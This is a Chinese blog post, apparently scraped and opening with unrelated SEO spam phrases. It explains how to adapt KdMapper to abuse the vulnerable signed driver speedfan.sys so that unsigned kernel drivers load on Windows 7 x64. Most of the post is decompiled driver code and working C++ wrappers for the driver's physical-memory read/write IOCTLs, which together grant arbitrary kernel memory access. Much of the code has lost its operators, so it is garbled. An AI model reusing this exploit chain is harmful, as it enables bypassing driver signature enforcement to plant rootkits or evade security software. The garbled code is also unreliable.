

宁波网站建设报价多少,智慧软文网,昆明小程序制作公司,提供邢台企业做网站1.背景 KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动#xff0c;本文是利用其它漏洞#xff08;参考《【转载】利用签名驱动漏洞加载未签名驱动》#xff09;做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。 2.驱动信息 驱动名称spee…1.背景 KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动本文是利用其它漏洞参考《【转载】利用签名驱动漏洞加载未签名驱动》做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。 2.驱动信息 驱动名称speedfan.sys 时间戳50DF59B7MD50FFE35F0B0CD5A324BBE22F02569AE3B文件版本2.3.11.0设备名称        \\.\SpeedFan读物理内存0x9C402428写物理内存0x9C40242CWindows 7支持Windows 10不支持Windows 11不支持 3.IDA分析 3.1 入口函数 NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {unsigned __int64 v2; // raxv2 BugCheckParameter2;if (!BugCheckParameter2 || BugCheckParameter2 0x2B992DDFA232i64){v2 ((unsigned __int64)BugCheckParameter2 ^ MEMORY[0xFFFFF78000000320]) 0xFFFFFFFFFFFFi64;if (!v2)v2 0x2B992DDFA232i64;BugCheckParameter2 v2;}BugCheckParameter3 ~v2;return CreateDevice(DriverObject, RegistryPath); } 3.2 创建设备和符号链接 NTSTATUS __fastcall CreateDevice(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {NTSTATUS result; // eax_UNICODE_STRING* v5; // rdisize_t v6; // rax__int64 v7; // r8NTSTATUS v8; // eaxNTSTATUS v9; // edi__int64 v10; // [rsp20h] [rbp-38h]struct _UNICODE_STRING DestinationString; // [rsp40h] [rbp-18h] BYREFPDEVICE_OBJECT DeviceObject; // [rsp68h] [rbp10h] BYREFRtlInitUnicodeString(DestinationString, aDeviceSpeedfan);result IoCreateDevice(DriverObject, RegistryPath-Length 114, DestinationString, 0x9C40u, 0, 0, DeviceObject);if (result 0){DeviceObject-Flags | 4u;v5 (_UNICODE_STRING*)DeviceObject-DeviceExtension;*(_DWORD*)v5[2].Length 0;*(_DWORD*)(v5[2].MaximumLength 1) 0;LODWORD(v5[2].Buffer) 0;v5[1].MaximumLength RegistryPath-MaximumLength;v6 RegistryPath-Length;v5[1].Buffer v5[7].Length;v5[1].Length v6;memmove(v5[7], RegistryPath-Buffer, v6);sub_175B4(v5);if ((int)sub_176C8(v5) 0){v7 *(unsigned int*)v5[2].Length;if (_bittest((const int*)v7, 0x1Du)){LODWORD(v10) v5[2].Buffer;DbgPrint(SpeedFan %s  Built Dec 29 2012 21:59:34  Debug %08X  Break %08X  Setup 
%08X\n,aX20311,v7,*(unsigned int*)(v5[2].MaximumLength 1),v10);}}v8 IoCreateSymbolicLink(v5, DestinationString);v9 v8;if (v8 0 || v8 0xC0000035){DriverObject-DriverUnload (PDRIVER_UNLOAD)sub_17008;DriverObject-MajorFunction[0] (PDRIVER_DISPATCH)sub_11008;DriverObject-MajorFunction[2] (PDRIVER_DISPATCH)sub_114C8;DriverObject-MajorFunction[14] (PDRIVER_DISPATCH)DeviceIoControl;result 0;}else{IoDeleteDevice(DeviceObject);result v9;}}return result; } 3.3 DeviceIoControl __int64 __fastcall DeviceIoControl(PDEVICE_OBJECT pDeviceObject, IRP* pIrp) {_IO_STACK_LOCATION* pIosp; // raxint ntStatus; // ebxPHYSICAL_ADDRESS* pMemoryInfo; // rdiunsigned int nInputBufferLength; // er12SIZE_T nOutputBufferLength; // r13unsigned int nIoControlCode; // esiLONGLONG PhysicalAddressV31; // rbxPVOID pMappedIoSpaceV32; // raxvoid* pMappedIoSpaceV33; // r14LONGLONG PhysicalAddressV34; // rbxPVOID pMappedIoSpaceV35; // raxvoid* pMappedIoSpaceV36; // r14void* Dst; // [rsp20h] [rbp-D8h]LONGLONG PhysicalAddressV52; // [rsp70h] [rbp-88h]LONGLONG PhysicalAddressV53; // [rsp70h] [rbp-88h]void* PhysicalAddress; // [rsp100h] [rbp8h]IRP* Irp; // [rsp108h] [rbp10h]Irp pIrp;pIosp pIrp-Tail.Overlay.CurrentStackLocation;pIrp-IoStatus.Information 0i64;ntStatus 0xC0000023;pMemoryInfo (PHYSICAL_ADDRESS*)pIrp-AssociatedIrp.SystemBuffer;nInputBufferLength pIosp-Parameters.DeviceIoControl.InputBufferLength;nOutputBufferLength pIosp-Parameters.DeviceIoControl.OutputBufferLength;nIoControlCode pIosp-Parameters.DeviceIoControl.IoControlCode;......switch (nIoControlCode){case 0x9C402428:if (nInputBufferLength 8 (_DWORD)nOutputBufferLength)// 读物理内存{PhysicalAddressV34 pMemoryInfo-QuadPart;PhysicalAddressV53 pMemoryInfo-QuadPart;pMappedIoSpaceV35 MmMapIoSpace(*pMemoryInfo, nOutputBufferLength, MmNonCached);pMappedIoSpaceV36 pMappedIoSpaceV35;*(_QWORD*)MajorVersion pMappedIoSpaceV35;if (pMappedIoSpaceV35){if (_bittest(v55, 0xEu)){LODWORD(v47) nOutputBufferLength;DbgPrint(IOCTL_PHYMEM_READ       ofo %p  pad %08X_%08X  
vad %p  siz %06X\n,v51,HIDWORD(PhysicalAddressV53),(unsigned int)PhysicalAddressV34,pMappedIoSpaceV35,v47);}memmove(pMemoryInfo, pMappedIoSpaceV36, nOutputBufferLength);Irp-IoStatus.Information nOutputBufferLength;ntStatus 0;v59 0;MmUnmapIoSpace(pMappedIoSpaceV36, (unsigned int)nOutputBufferLength);}else{ntStatus 0xC0000088;}}goto LABEL_145;case 0x9C40242C:if (nInputBufferLength 8)         // 写物理内存{PhysicalAddressV31 pMemoryInfo-QuadPart;PhysicalAddressV52 pMemoryInfo-QuadPart;nInputBufferLength - 8;pMappedIoSpaceV32 MmMapIoSpace(*pMemoryInfo, nInputBufferLength, MmNonCached);pMappedIoSpaceV33 pMappedIoSpaceV32;*(_QWORD*)MajorVersion pMappedIoSpaceV32;if (pMappedIoSpaceV32){if (_bittest(v55, 0xEu)){LODWORD(v47) nInputBufferLength;DbgPrint(IOCTL_PHYMEM_WRITE      ofo %p  pad %08X_%08X  vad %p  siz %06X\n,v51,HIDWORD(PhysicalAddressV52),(unsigned int)PhysicalAddressV31,pMappedIoSpaceV32,v47);}memmove(pMappedIoSpaceV33, pMemoryInfo[1], nInputBufferLength);Irp-IoStatus.Information 0i64;ntStatus 0;v59 0;MmUnmapIoSpace(pMappedIoSpaceV33, nInputBufferLength);}else{ntStatus 0xC0000088;}}goto LABEL_145;LABEL_145:if (ntStatus 0)goto LABEL_149;v5 v51;goto LABEL_147;}......LABEL_149:Irp-IoStatus.Status ntStatus;IofCompleteRequest(Irp, 0);return (unsigned int)ntStatus; } 其中 0x9C402428 为读取物理内存 0x9C40242C 为写入物理内存。 3.4 使用注意事项 实现使用的是MmMapIoSpace将物理内存映射到进程空间或者之后再读写。由于使用了物理内存在代码过程中会遇到物理页面和虚拟页面不一一对应的问题问题说明及解决办法见《KdMapper扩展中遇到的相关问题》。 4. 
代码实现 4.1 .h文件 #ifndef RtlOffsetToPointer #define RtlOffsetToPointer(Base, Offset)  ((PCHAR)( ((PCHAR)(Base)) ((ULONG_PTR)(Offset))  )) #endif#ifndef RtlPointerToOffset #define RtlPointerToOffset(Base, Pointer)  ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base))  )) #endif#define SPEEDFAN_DEVICE_TYPE          (DWORD)0x9C40 #define SPEEDFAN_READ_PHYSICAL_MEMORY_FUNCID   (DWORD)0x90A #define SPEEDFAN_WRITE_PHYSICAL_MEMORY_FUNCID (DWORD)0x90B#define IOCTL_SPEEDFAN_READ_PHYSICAL_MEMORY      \CTL_CODE(SPEEDFAN_DEVICE_TYPE, SPEEDFAN_READ_PHYSICAL_MEMORY_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9C402428 #define IOCTL_SPEEDFAN_WRITE_PHYSICAL_MEMORY    \CTL_CODE(SPEEDFAN_DEVICE_TYPE, SPEEDFAN_WRITE_PHYSICAL_MEMORY_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9C40242C4.2 .c文件 NTSTATUS sokno_driver::SuperCallDriverEx(_In_ HANDLE DeviceHandle,_In_ ULONG IoControlCode,_In_ PVOID InputBuffer,_In_ ULONG InputBufferLength,_In_opt_ PVOID OutputBuffer,_In_opt_ ULONG OutputBufferLength,_Out_opt_ PIO_STATUS_BLOCK IoStatus) {IO_STATUS_BLOCK ioStatus;NTSTATUS ntStatus NtDeviceIoControlFile(DeviceHandle,NULL,NULL,NULL,ioStatus,IoControlCode,InputBuffer,InputBufferLength,OutputBuffer,OutputBufferLength);if (ntStatus STATUS_PENDING) {ntStatus NtWaitForSingleObject(DeviceHandle,FALSE,NULL);}if (IoStatus)*IoStatus ioStatus;return ntStatus; }BOOL sokno_driver::SuperCallDriver(_In_ HANDLE DeviceHandle,_In_ ULONG IoControlCode,_In_ PVOID InputBuffer,_In_ ULONG InputBufferLength,_In_opt_ PVOID OutputBuffer,_In_opt_ ULONG OutputBufferLength) {BOOL bResult;IO_STATUS_BLOCK ioStatus;NTSTATUS ntStatus SuperCallDriverEx(DeviceHandle,IoControlCode,InputBuffer,InputBufferLength,OutputBuffer,OutputBufferLength,ioStatus);bResult NT_SUCCESS(ntStatus);SetLastError(RtlNtStatusToDosError(ntStatus));return bResult; }BOOL WINAPI sokno_driver::SuperReadWritePhysicalMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR PhysicalAddress,_In_reads_bytes_(NumberOfBytes) PVOID Buffer,_In_ ULONG NumberOfBytes,_In_ BOOLEAN 
DoWrite) {BOOL bResult FALSE;DWORD dwError ERROR_SUCCESS;__try {if (DoWrite) {PPHYSICAL_ADDRESS pWriteInfo (PPHYSICAL_ADDRESS)malloc(sizeof(PHYSICAL_ADDRESS) NumberOfBytes);if (pWriteInfo){pWriteInfo-QuadPart PhysicalAddress;RtlCopyMemory(pWriteInfo[1], Buffer, NumberOfBytes);bResult SuperCallDriver(DeviceHandle, IOCTL_SPEEDFAN_WRITE_PHYSICAL_MEMORY, pWriteInfo, sizeof(PHYSICAL_ADDRESS) NumberOfBytes, NULL, NULL);if (!bResult){Log(LSuperReadWritePhysicalMemory Write Memory SuperCallDriver failed\r\n);}}else{Log(LSuperReadWritePhysicalMemory Write Memory malloc failed\r\n);}}else {PHYSICAL_ADDRESS address;address.QuadPart PhysicalAddress;bResult SuperCallDriver(DeviceHandle, IOCTL_SPEEDFAN_READ_PHYSICAL_MEMORY, address, sizeof(address), Buffer, NumberOfBytes);if (!bResult){Log(LSuperReadWritePhysicalMemory Read Memory SuperCallDriver failed\r\n);}}}__except (EXCEPTION_EXECUTE_HANDLER) {bResult FALSE;dwError GetExceptionCode();Log(L[!] Error AtszioReadWritePhysicalMemory Exception! std::endl);}SetLastError(dwError);return bResult; }BOOL WINAPI sokno_driver::SuperReadPhysicalMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR PhysicalAddress,_In_ PVOID Buffer,_In_ ULONG NumberOfBytes) {return SuperReadWritePhysicalMemory(DeviceHandle,PhysicalAddress,Buffer,NumberOfBytes,FALSE); }BOOL WINAPI sokno_driver::SuperWritePhysicalMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR PhysicalAddress,_In_reads_bytes_(NumberOfBytes) PVOID Buffer,_In_ ULONG NumberOfBytes) {return SuperReadWritePhysicalMemory(DeviceHandle,PhysicalAddress,Buffer,NumberOfBytes,TRUE); }BOOL WINAPI sokno_driver::SuperWriteKernelVirtualMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR Address,_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,_In_ ULONG NumberOfBytes) {BOOL bResult;ULONG_PTR physicalAddress 0;SetLastError(ERROR_SUCCESS);bResult SuperVirtualToPhysical(DeviceHandle,Address,physicalAddress);if (bResult) {bResult SuperReadWritePhysicalMemory(DeviceHandle,physicalAddress,Buffer,NumberOfBytes,TRUE);}return 
bResult; }BOOL WINAPI sokno_driver::SuperReadKernelVirtualMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR Address,_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,_In_ ULONG NumberOfBytes) {BOOL bResult;ULONG_PTR physicalAddress 0;SetLastError(ERROR_SUCCESS);bResult SuperVirtualToPhysical(DeviceHandle,Address,physicalAddress);if (bResult) {bResult SuperReadWritePhysicalMemory(DeviceHandle,physicalAddress,Buffer,NumberOfBytes,FALSE);}return bResult; }其中 SuperReadKernelVirtualMemory 和 SuperWriteKernelVirtualMemory 读写虚拟地址内存页面中的 虚拟地址转物理地址函数 SuperVirtualToPhysical 的实现在《KdMapper扩展实现之虚拟地址转物理地址 》一文中有介绍。 同时由于使用了MmMapIoSpace,故其只能在Win7上运行详见《KdMapper扩展实现之虚拟地址转物理地址 》。 5. 运行效果 Windows 7 x64 环境上运行的效果如下其中驱动 HelloWorld.sys为未签名的驱动其详细说明见文章《KdMapper被加载驱动的实现》。 ​ 6.特别提示 使用 speedfan.sys 制作的KdMapper只能在Win 7 x64环境上运行Win10以上环境由于使用了MmMapIoSpace会导致蓝屏。
